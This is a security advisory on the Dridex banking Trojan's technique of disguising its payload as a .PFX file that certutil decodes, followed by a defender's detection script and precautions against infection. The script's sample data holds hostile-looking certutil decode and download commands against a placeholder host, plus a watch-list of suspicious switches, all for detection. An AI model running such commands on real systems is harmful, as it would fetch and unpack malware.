This is a security alert for all TruShield clients, the financial services industry, and the community as a whole. We have learned of a recent wave of threats targeting the financial services sector. The threat is the banking Trojan Dridex, which has returned with an improved technique that avoids detection by security software.
About The Trojan
Dridex is one of the most prevalent banking Trojans affecting users in the United States, Brazil, China, Germany, and Japan. It targets customers of the financial/banking industry and steals banking credentials and personal information through HTML injections. Dridex is delivered by a phishing email carrying a Microsoft Word or Excel attachment, or a link to an exploit kit landing page. When the user opens the document, they are asked to enable macros, which the malicious code needs in order to run; once macros are enabled, the Dridex malware is installed. Macros are disabled by default in Word and Excel.
According to Symantec, once an attacker gains access to the user’s system, they can do the following:
- Upload and download files
- Monitor network traffic
- Take screenshots of a browser
- Add the compromised computer to a botnet
- Retrieve configuration details by communicating through a peer-to-peer protocol
- Download and execute additional modules
- Download and run other files and inject itself into browser processes for Internet Explorer, Chrome, and Firefox to monitor communications and steal information
How the New Mode of Operation Works
This new technique differs from the techniques Dridex previously used to infect users. Trend Micro researchers discovered that Dridex’s new mode of operation is to have the macro script download a Personal Information Exchange (PFX) file; this file avoids detection by antivirus software and then infects the computer. PFX files are normally used by software certificates to store public and private encryption keys for various operations, so antivirus software does not flag them, and they are ignored by later scans.
The delivery of this malware is unchanged: the user receives an email asking them to download a file; once downloaded, the user is prompted to open a .ZIP attachment and the Word document inside it, and a .PFX file is downloaded. This file is encrypted and will not run on the user’s system as-is. Certutil is used to decode the file and convert it from a .PFX into a .EXE, which then infects the system with Dridex. Because the file is marked as safe by antivirus software, Dridex goes unnoticed.
Under its old mode of operation, the banking Trojan Dridex was latent and easily identified. With its new mode of operation, which uses Personal Information Exchange files to infect a system while avoiding detection by security software, its prevalence will persist because it will be harder to block, detect and mitigate.
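As an added illustration for defenders (this code is not part of the original alert), the script below shows two checks that target the certutil decoding step described above: it flags process-creation events where an Office application spawns certutil with a decode or download switch, and it tests whether a supposed .pfx file is really base64 text that decodes to a Windows executable rather than a genuine PKCS#12 blob. The sample events and file contents are constructed; the Sysmon-style field names and the list of watched switches are assumptions for the example.

```python
import base64

# Constructed Sysmon-style process-creation records (Event ID 1 fields); not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -decode C:\Users\u\AppData\Local\Temp\invoice.pfx C:\Users\u\AppData\Local\Temp\invoice.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -verify server.cer"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -urlcache -split -f http://example.invalid/x.pfx x.pfx"},
]

OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
# Switches that turn certutil into a decoder/downloader; assumed watch-list, extend as needed.
SUSPICIOUS_SWITCHES = ("-decode", "-decodehex", "-urlcache")

def is_suspicious_certutil(event):
    """True when certutil is spawned by an Office process with a decode/download switch."""
    image = event["Image"].lower()
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    tokens = event["CommandLine"].lower().split()
    if not image.endswith("certutil.exe") or parent not in OFFICE_PARENTS:
        return False
    return any(switch in tokens for switch in SUSPICIOUS_SWITCHES)

def find_suspicious(events):
    return [e for e in events if is_suspicious_certutil(e)]

def masquerading_pfx(data: bytes) -> bool:
    """True if a supposed .pfx is really base64 text (certutil -encode style, with optional
    -----BEGIN/END----- lines) that decodes to a PE image. A genuine PKCS#12 file is binary
    DER and starts with 0x30 (ASN.1 SEQUENCE), so it is rejected immediately."""
    if data[:1] == b"\x30":
        return False
    text = data.decode("ascii", errors="ignore")
    body = "".join(line.strip() for line in text.splitlines() if not line.startswith("-----"))
    try:
        decoded = base64.b64decode(body, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return False
    return decoded[:2] == b"MZ"

# Constructed sample: a stub with an MZ header wrapped the way certutil -encode writes output.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00"
FAKE_PFX = (b"-----BEGIN CERTIFICATE-----\r\n" + base64.encodebytes(FAKE_PE)
            + b"-----END CERTIFICATE-----\r\n")

if __name__ == "__main__":
    for e in find_suspicious(SAMPLE_EVENTS):
        print("ALERT:", e["ParentImage"], "->", e["CommandLine"])
    print("invoice.pfx is a disguised executable:", masquerading_pfx(FAKE_PFX))
```

The file check is a triage aid, not proof of malice: a legitimate PEM-wrapped certificate also decodes cleanly but will not begin with an MZ header.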
Since the delivery of this malware remains the same, some precautionary steps to take to prevent infections are:
- Do not open files or enable macros from unknown senders.
- Verify sources for emails about compromised accounts.
- Create a policy that will block messages with attachments from unknown sources.
- Raise awareness of this type of threat.
- If infected, change passwords for all accounts from a different system that is not infected.
- Keep security software and the operating system up to date.